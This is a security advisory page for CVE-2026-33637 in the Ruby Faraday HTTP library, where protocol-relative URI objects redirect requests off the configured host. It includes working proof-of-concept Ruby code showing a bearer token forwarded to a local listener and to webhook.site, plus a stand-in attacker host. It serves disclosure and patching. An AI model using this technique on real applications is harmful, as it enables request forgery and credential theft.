GHSA-5rv5-xj5j-3484

Suggest an improvement
Source
https://github.com/advisories/GHSA-5rv5-xj5j-3484
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5rv5-xj5j-3484/GHSA-5rv5-xj5j-3484.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5rv5-xj5j-3484
Aliases
  • CVE-2026-33637
Downstream
Related
Published
2026-05-18T14:51:51Z
Modified
2026-06-05T14:16:15.312998127Z
Severity
  • 0.0 (None) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N CVSS Calculator
Summary
Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2: protocol-relative URI objects still bypass host scoping
Details

Summary

Faraday::Connection#build_exclusive_url still allows protocol-relative host override when the request target is provided as a URI object instead of a String. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and can redirect a request built from a fixed-base Faraday::Connection to an attacker-controlled host while preserving connection-scoped headers such as Authorization.

Affected Component

  • Repository File(s)/Endpoint(s):
    • lib/faraday/connection.rb
    • lib/faraday/request.rb
    • spec/faraday/connection_spec.rb
    • spec/faraday/request_spec.rb
  • Function(s):
    • Faraday::Connection#build_exclusive_url
    • Faraday::Connection#run_request
    • Faraday::Request#url
    • Faraday::Request#to_env
  • Version(s) Tested:
    • Faraday 2.14.1
    • repository HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca

Attacker Profile

  • Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection
  • Access Required: Ability to supply data that the application converts to URI.parse(...) and passes to conn.get(...), [conn.post](http://conn.post/)(...), or req.url(...)
  • Capability: Control over a protocol-relative URI such as URI("//evil.example/pwn")

Steps to Reproduce

  1. Use the current repository checkout and load Faraday from lib/.
  2. Build a fixed-base connection and provide a protocol-relative URI object to req.url.
  3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host.
  4. Observe that the connection-scoped Authorization header remains attached to the off-host request.

Verification Evidence

  • Environment: macOS, Ruby from local environment, Faraday 2.14.1, faraday-net_http, local WEBrick listener on 127.0.0.1:4567, HEAD a01039c948d3e9e41e03d152aed7244f0fb4d5ca
  • Commands executed:
$ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start'
$ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body'

- PoC code (inline):

require "faraday"
require "faraday/net_http"

conn = Faraday.new(url: "http://trusted.example/base", headers: {
  "Authorization" => "Bearer secret-token"
}) { |f| f.adapter :net_http }

target = ["//127.0.0.1:4567", "/pwn"].join
resp = conn.get(URI(target))

puts resp.status
puts resp.body

- Exit code: 0 - stdout (relevant excerpt):

200
host=127.0.0.1
auth=Bearer secret-token
path=/pwn

- stderr (relevant excerpt):

N/A

- Artifacts: none

Additional External Confirmation

The issue was also independently reproduced against a public HTTP collector on Faraday 2.14.1 using the default net_http adapter:

require "faraday"
require "faraday/net_http"

conn = Faraday.new(
  url: "http://trusted.example/base",
  headers: { "Authorization" => "Bearer secret-token" }
) { |f| f.adapter :net_http }

target = ["//webhook.site", "/<collector-id>"].join
resp = conn.get(URI(target))
resp.status
# => 200
resp.url.host
# => "webhook.site"

This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage.

Supporting Materials

  • Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2
  • Existing CVE for the original string-based issue: CVE-2026-25765
  • Existing regression tests for the string-only fix:
    • spec/faraday/connection_spec.rb:314-345
  • Existing test proving supported URI request input:
    • spec/faraday/request_spec.rb:26-31

Impact

The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Database specific 
{
    "cwe_ids": [
        "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-18T14:51:51Z",
    "nvd_published_at": "2026-05-19T19:16:49Z",
    "severity": "LOW"
}
References

Affected packages

RubyGems / faraday

Package

Name
faraday
Purl
pkg:gem/faraday

Affected ranges

Type
ECOSYSTEM
Events
Introduced
2.0.0
Fixed
2.14.2

Affected versions

2.*
2.0.0
2.0.1
2.1.0
2.2.0
2.3.0
2.4.0
2.5.0
2.5.1
2.5.2
2.6.0
2.7.0
2.7.1
2.7.2
2.7.3
2.7.4
2.7.5
2.7.6
2.7.7
2.7.8
2.7.9
2.7.10
2.7.11
2.7.12
2.8.0
2.8.1
2.9.0
2.9.1
2.9.2
2.10.0
2.10.1
2.11.0
2.12.0
2.12.1
2.12.2
2.12.3
2.13.0
2.13.1
2.13.2
2.13.3
2.13.4
2.14.0
2.14.1

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5rv5-xj5j-3484/GHSA-5rv5-xj5j-3484.json"
last_known_affected_version_range 
"<= 2.14.1"